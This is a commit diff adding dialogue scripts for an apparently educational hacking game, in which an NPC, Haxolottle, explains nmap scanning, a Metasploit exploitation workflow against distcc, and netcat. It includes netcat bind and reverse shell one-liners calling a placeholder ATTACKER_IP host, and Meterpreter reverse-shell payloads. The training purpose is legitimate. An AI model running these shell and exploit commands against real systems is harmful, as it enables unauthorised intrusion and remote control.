feat: Create reusable tool explanations and update intro_linux for game narrative

- Add nmap_basics.ink, metasploit_basics.ink, netcat_basics.ink as reusable tools - Completely rewrite intro_linux.ink: - Remove all unnecessary tracking variables - Change from 'Tech Instructor' to 'Haxolottle' - Remove lab/training/exercise language - Convert to helpful NPC offering to explain concepts - Keep all technical content but make conversational - Link to reusable tool files where appropriate - Use proper ink patterns (hub structure, #exit_conversation)
2026-02-21 11:18:08 +00:00 · 2025-11-19 18:24:26 +00:00
parent e46d8544a2
commit be497931de
4 changed files with 640 additions and 707 deletions
--- a/story_design/ink/game_scenarios/intro_linux.ink
+++ b/story_design/ink/game_scenarios/intro_linux.ink
--- a/story_design/ink/game_scenarios/tools/metasploit_basics.ink
+++ b/story_design/ink/game_scenarios/tools/metasploit_basics.ink
@@ -0,0 +1,148 @@
+// Metasploit Framework - Reusable Explanations
+// Used across multiple scenarios
+
+=== metasploit_what_is_it ===
+Haxolottle: Metasploit is your exploitation toolkit, little axolotl.
+
+Haxolottle: It's a framework with thousands of exploits, payloads, and post-exploitation tools all in one place.
+
+Haxolottle: Think of it as a Swiss Army knife for hacking.
+
+ [How do I start using it?]
+    -> metasploit_getting_started
+
+ [What can it do?]
+    -> metasploit_capabilities
+
+ [Got it]
+    -> DONE
+
+=== metasploit_getting_started ===
+Haxolottle: Start the console: msfconsole
+
+Haxolottle: It takes a moment to load - over 2000 exploits to initialize.
+
+Haxolottle: Once you're in, you'll see the msf > prompt. That's your command center.
+
+ [How do I find exploits?]
+    Haxolottle: Use search: search apache or search platform:windows
+
+    Haxolottle: You can search by name, platform, CVE number, whatever you know about the target.
+
+    Haxolottle: Try: search cve:2021-3156 to find a specific vulnerability.
+
+ [How do I use an exploit?]
+    -> metasploit_exploitation_workflow
+
+ [Show me the basic workflow]
+    -> metasploit_exploitation_workflow
+
+ [That's enough for now]
+    -> DONE
+
+=== metasploit_capabilities ===
+Haxolottle: Metasploit does it all, really.
+
+Haxolottle: Exploitation: Thousands of exploits for every platform - Windows, Linux, web apps, you name it.
+
+Haxolottle: Payloads: After exploitation, what do you want? A shell? Meterpreter? Execute a command?
+
+Haxolottle: Post-exploitation: Once you're in, gather info, escalate privileges, pivot to other systems.
+
+Haxolottle: It even has auxiliary modules for scanning, fuzzing, and denial of service.
+
+ [Tell me about the workflow]
+    -> metasploit_exploitation_workflow
+
+ [What's Meterpreter?]
+    -> meterpreter_intro
+
+ [I get the idea]
+    -> DONE
+
+=== metasploit_exploitation_workflow ===
+Haxolottle: Here's the standard workflow:
+
+Haxolottle: 1. Search for an exploit: search distcc
+
+Haxolottle: 2. Select it: use exploit/unix/misc/distcc_exec
+
+Haxolottle: 3. Check options: show options
+
+Haxolottle: 4. Set required options: set RHOST 10.0.0.5 and set LHOST YOUR_IP
+
+Haxolottle: 5. Choose a payload: show payloads, then set PAYLOAD cmd/unix/reverse
+
+Haxolottle: 6. Launch: exploit or run
+
+ [What's RHOST and LHOST?]
+    Haxolottle: RHOST is the remote host - your target's IP address.
+
+    Haxolottle: LHOST is your local host - your Kali machine's IP, where shells connect back to.
+
+    Haxolottle: Always double-check these before running an exploit!
+
+ [What if the exploit doesn't work?]
+    Haxolottle: First, run show options again and verify everything is set correctly.
+
+    Haxolottle: Check that the target is actually running the vulnerable service.
+
+    Haxolottle: Some exploits are unreliable or version-specific. Try a different one.
+
+ [Tell me about payloads]
+    -> metasploit_payloads
+
+ [Clear enough]
+    -> DONE
+
+=== metasploit_payloads ===
+Haxolottle: Payloads are what happens after exploitation succeeds.
+
+Haxolottle: Simple shells: windows/shell/reverse_tcp or cmd/unix/reverse
+
+Haxolottle: These give you a basic command prompt on the target.
+
+Haxolottle: Meterpreter: windows/meterpreter/reverse_tcp or linux/x86/meterpreter/reverse_tcp
+
+Haxolottle: Meterpreter is way more powerful - file upload/download, keylogging, process migration, you name it.
+
+ [When should I use which payload?]
+    Haxolottle: For quick access and simple commands, use regular shells.
+
+    Haxolottle: For post-exploitation work - gathering intel, escalating privileges, pivoting - use Meterpreter.
+
+    Haxolottle: Meterpreter is also more stable and has better error handling.
+
+ [Tell me more about Meterpreter]
+    -> meterpreter_intro
+
+ [Got it]
+    -> DONE
+
+=== meterpreter_intro ===
+Haxolottle: Meterpreter is Metasploit's advanced payload.
+
+Haxolottle: It runs entirely in memory - no files written to disk, harder to detect.
+
+Haxolottle: It's dynamically extensible - load features as you need them.
+
+Haxolottle: And it has tons of built-in commands for everything you'd want to do post-exploitation.
+
+ [What commands does Meterpreter have?]
+    Haxolottle: Type help after getting a Meterpreter shell to see them all.
+
+    Haxolottle: Key ones: getuid (current user), ps (processes), migrate (switch processes)
+
+    Haxolottle: File operations: ls, cd, download, upload, cat
+
+    Haxolottle: System: sysinfo, getprivs, shell (drop to OS shell)
+
+ [How do I get a Meterpreter shell?]
+    Haxolottle: Just use a Meterpreter payload when exploiting.
+
+    Haxolottle: Like: set PAYLOAD windows/meterpreter/reverse_tcp
+
+    Haxolottle: Then exploit normally. You'll get a meterpreter > prompt instead of a system shell.
+
+ [I understand]
+    -> DONE
--- a/story_design/ink/game_scenarios/tools/netcat_basics.ink
+++ b/story_design/ink/game_scenarios/tools/netcat_basics.ink
@@ -0,0 +1,98 @@
+// Netcat Tool - Reusable Explanations
+// Used in intro_linux and vulnerabilities scenarios
+
+=== netcat_what_is_it ===
+Haxolottle: Netcat is the Swiss Army knife of networking, little axolotl.
+
+Haxolottle: It can read and write data across network connections - TCP or UDP.
+
+Haxolottle: People call it "nc" for short, and it's on basically every Linux system.
+
+ [What can I use it for?]
+    -> netcat_uses
+
+ [How do I use it?]
+    -> netcat_basic_usage
+
+ [Got it]
+    -> DONE
+
+=== netcat_uses ===
+Haxolottle: Netcat does a ton of things:
+
+Haxolottle: Port scanning: Check if a port is open
+
+Haxolottle: File transfer: Send files between systems
+
+Haxolottle: Banner grabbing: Connect to services and see what they say
+
+Haxolottle: Bind shells: Listen for connections and serve up a shell
+
+Haxolottle: Reverse shells: Connect back to an attacker and give them a shell
+
+ [Tell me about shells]
+    -> netcat_shells
+
+ [How do I use these features?]
+    -> netcat_basic_usage
+
+ [I understand]
+    -> DONE
+
+=== netcat_basic_usage ===
+Haxolottle: Basic netcat commands:
+
+Haxolottle: Connect to a port: nc TARGET_IP PORT
+
+Haxolottle: Listen on a port: nc -l -p PORT or nc -lvp PORT
+
+Haxolottle: Send a file: nc -w 1 TARGET_IP PORT < file.txt
+
+Haxolottle: Receive a file: nc -l -p PORT > file.txt
+
+ [What's the -l flag?]
+    Haxolottle: The -l flag means "listen" - act as a server instead of a client.
+
+    Haxolottle: Without -l, netcat connects TO something.
+
+    Haxolottle: With -l, netcat waits FOR something to connect.
+
+ [Tell me about shells]
+    -> netcat_shells
+
+ [That's clear]
+    -> DONE
+
+=== netcat_shells ===
+Haxolottle: Netcat can create shells - command line access to remote systems.
+
+Haxolottle: **Bind shell**: Target listens, you connect.
+
+Haxolottle: On target: nc -l -p 4444 -e /bin/bash (Linux) or nc.exe -l -p 4444 -e cmd.exe (Windows)
+
+Haxolottle: On attacker: nc TARGET_IP 4444
+
+Haxolottle: **Reverse shell**: You listen, target connects to you.
+
+Haxolottle: On attacker: nc -l -p 4444
+
+Haxolottle: On target: nc ATTACKER_IP 4444 -e /bin/bash (Linux) or nc.exe ATTACKER_IP 4444 -e cmd.exe (Windows)
+
+ [Why would I use one over the other?]
+    Haxolottle: Bind shells are simpler but firewalls usually block incoming connections.
+
+    Haxolottle: Reverse shells bypass firewalls because the target initiates the connection outbound.
+
+    Haxolottle: In real attacks, reverse shells are much more reliable.
+
+ [What's the -e flag doing?]
+    Haxolottle: The -e flag executes a program and pipes all connection data through it.
+
+    Haxolottle: So -e /bin/bash means "run bash and send everything through this connection."
+
+    Haxolottle: The attacker types commands, they go through netcat to bash, output comes back.
+
+    Haxolottle: Note: Not all netcat versions support -e for security reasons.
+
+ [I get it now]
+    -> DONE
--- a/story_design/ink/game_scenarios/tools/nmap_basics.ink
+++ b/story_design/ink/game_scenarios/tools/nmap_basics.ink
@@ -0,0 +1,85 @@
+// Nmap Tool - Reusable Explanations
+// Used across multiple scenarios
+
+=== nmap_what_is_it ===
+Haxolottle: Nmap is your eyes on the network, little axolotl.
+
+Haxolottle: It's a network scanner that reveals what's running on remote systems - open ports, services, even operating systems.
+
+Haxolottle: Every hacker starts with reconnaissance, and Nmap is the reconnaissance king.
+
+ [How do I use it?]
+    -> nmap_basic_usage
+
+ [What can it tell me?]
+    -> nmap_capabilities
+
+ [Got it, thanks]
+    -> DONE
+
+=== nmap_basic_usage ===
+Haxolottle: The simplest scan: nmap TARGET_IP
+
+Haxolottle: This checks the 1000 most common ports. Quick and dirty.
+
+Haxolottle: Want more detail? Add -sV for service versions: nmap -sV TARGET_IP
+
+Haxolottle: Need everything? Scan all ports: nmap -p- TARGET_IP
+
+Haxolottle: That one takes time, but you'll find every listening service.
+
+ [What about stealth?]
+    Haxolottle: Smart question. Use SYN scans: sudo nmap -sS TARGET_IP
+
+    Haxolottle: They're faster and slightly stealthier than full TCP connections.
+
+    Haxolottle: Though honestly, any halfway decent IDS will still spot you.
+
+ [Tell me more about what Nmap reveals]
+    -> nmap_capabilities
+
+ [That's what I needed]
+    -> DONE
+
+=== nmap_capabilities ===
+Haxolottle: Nmap tells you the attack surface - everything exposed to the network.
+
+Haxolottle: Open ports: Is SSH running? Web server? Database?
+
+Haxolottle: Service versions: Not just "SSH," but "OpenSSH 7.4" - specific enough to look up vulnerabilities.
+
+Haxolottle: Operating system: With -O flag, Nmap can guess if it's Windows, Linux, what version.
+
+Haxolottle: And with NSE scripts (--script), it can even check for specific vulnerabilities.
+
+ [How do I scan for vulnerabilities?]
+    Haxolottle: Use the vuln script category: nmap --script vuln TARGET_IP
+
+    Haxolottle: It's not as thorough as dedicated scanners, but it catches common issues.
+
+ [Show me some useful command examples]
+    -> nmap_examples
+
+ [I understand Nmap now]
+    -> DONE
+
+=== nmap_examples ===
+Haxolottle: Here are the commands I use most:
+
+Haxolottle: Full scan with versions: nmap -sV -p- TARGET_IP
+
+Haxolottle: Fast scan with OS detection: nmap -sS -O TARGET_IP
+
+Haxolottle: Vulnerability check: nmap --script vuln -sV TARGET_IP
+
+Haxolottle: Save results: nmap -sV -oA scan_results TARGET_IP
+
+Haxolottle: The -oA saves in all formats - normal, XML, and greppable.
+
+ [What's the TARGET_IP placeholder?]
+    Haxolottle: Just replace it with the actual IP address you're scanning.
+
+    Haxolottle: Like: nmap -sV 10.0.0.5
+
+ [Thanks, that's clear]
+    -> DONE